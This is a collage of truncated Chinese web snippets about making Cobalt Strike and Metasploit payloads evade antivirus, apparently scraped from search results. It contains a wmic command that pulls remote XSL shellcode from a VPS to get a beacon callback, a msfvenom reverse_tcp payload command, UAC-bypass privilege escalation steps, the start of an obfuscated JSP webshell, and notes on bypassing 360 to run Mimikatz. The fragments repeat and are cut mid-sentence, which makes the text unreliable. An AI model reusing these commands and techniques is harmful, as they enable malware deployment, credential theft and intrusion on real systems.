bypassav 从一个老项目改起 源项目地址https://github.com/pureqh/bypassAV 当时有人写了插件,地址为https://github.com/hack2fun/BypassAV,但是bypassAV后面更新了条件触发、随机生成go脚本等,于是参考前者写了一个新的。 主要学习cs免杀程序生成中 字符串处理 不同平台go:generate写法 shellcode处理 写的 packa...
3、cs插件AMSI_bypass:https://github.com/Ridter/AMSI_bypass,下载插件后,添加至cs客户端。 4、点击攻击——AMSI bypass即可进入操作界面。 5、无需点击hta,点击开始即可弹出攻击命令。 6、执行命令,即可上线。 4、mshta上线cs 4.1、适用场景 mshta命令可以执行。 4.2、利用条件 mshta、cs、AMSI_bypass 4.3、使...
6.修复若干问题以及最新特征(url错误请求泄露信息特征) 7.bypass 360核晶模式:截图,Mimikatz,Hashdump(参考论坛一篇文章修改而成) 新出了个漏洞,就简单更新一下吧。简单修复了一下最新出来的xss漏洞. 1.新加主机ip归属地查询,用本地纯真ip地址库. 2.修改默认配置文件存放文件名.也可以自行对比代码,自行修改文件名...
二开说明 1.去除ListenerConfig中的特征水印 2.修改Stager Url校验算法 3.修改默认登录int长度48879,让网上的爆破脚本无法爆破 4.修改beacon配置信息的默认密钥,不会被默认的脚本获取到配置信息 5.修改原版的ua头 6.修复若干问题以及最新特征(url错误请求泄露信息特征) 7.bypass 360核晶模式:截图,Mimikatz,Hashdump(...
参考:https://github.com/Ridter/AMSI_bypass 实际测试可过36X和火X。 将shellcode.xsl部署在vps上 在靶机上执行命令,成功上线: wmic os get /format:"http://192.x.x.x:8080/shellcode.xsl" 此方法已在git上发布CS插件(3年前的方法都不修吗orz) ...
使用virustotal 查杀了一下生成的 bypass_go.exe,发现被 40 个引擎检测到,不得不说这效果很一般。 实测可以过360 安全卫士、 360 杀毒,但腾讯电脑管家、火绒不行。 看到VT 的检测结果后,我还以为四款杀软都能检测到呢,没想到啊。 0x07 免杀插件
使用CS自带的插件进行绕过提权 直接提到了system权限 提权后可以完成添加用户的命令 MSF绕过UAC bypassuac模块 使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置 生成一个MSF的SHELL msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=3333 -f ...
Jsp 基础免杀是参考的@yzddMr6师傅的 https://yzddmr6.tk/posts/webshell-bypass-jsp/ 文章 let jspshell ="<%@ page contentType=\"text/html;charset=UTF-8\" import=\"javax.xml.bind.DatatypeConverter\" language=\"java\" %><%Class rt = Class.forName(new String(DatatypeConverter.parseHexBinary...
拿到一个普通管理员的SHELL,在CS中没有*号代表有UAC 执行添加用户的命令时显示拒绝访问 使用CS自带的插件进行绕过提权 直接提到了system权限 提权后可以完成添加用户的命令 MSF绕过UAC bypassuac模块 使用该模块提权的使用,当前用户必须是管理员组中的用户,UAC为默认设置 ...
1.1 插件效果 1.2 使用方法 1.在工具栏导入 CS 的 32 位 RAW 的 payload 文件 (attacks – > packages – > payload generator – > output:raw 后缀为 bin),将免杀后的文件放入 VPS 中。 2.在 Goby 插件配置中设置 VPS 免杀文件地址,在实际使用中也可以进行实时的更改。